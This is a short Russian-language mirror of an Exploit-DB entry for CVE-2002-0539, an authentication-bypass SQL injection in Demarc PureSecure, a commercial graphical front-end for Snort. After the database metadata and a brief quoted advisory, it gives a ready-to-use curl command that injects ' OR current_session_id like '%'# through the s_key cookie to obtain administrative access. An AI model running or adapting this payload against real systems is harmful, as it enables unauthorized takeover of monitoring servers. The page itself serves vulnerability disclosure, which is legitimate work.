- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21384
- Проверка EDB
-
- Пройдено
- Автор
- POKLEYZZ SAKAMANIAKA
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2002-0539
- Дата публикации
- 2002-04-15
Код:
source: https://www.securityfocus.com/bid/4520/info
Demarc PureSecure is a commercially available graphical front-end for Snort, in addition to being a generalized network monitoring solution. Snort is an open-source NIDS (Network Intrusion Detection System). Demarc PureSecure will run on most Linux and Unix variants, as well as Microsoft Windows NT/2000/XP operating systems.
A vulnerability has been reported in some versions of PureSecure. User supplied input is used to construct a SQL statement, allowing SQL injection attacks. Administrative access may be gained through exploitation of this flaw.
curl -b s_key=\'%20OR%20current_session_id%20like%20\'%\'%23 https://<lame host>/dm/demarc- Источник
- www.exploit-db.com
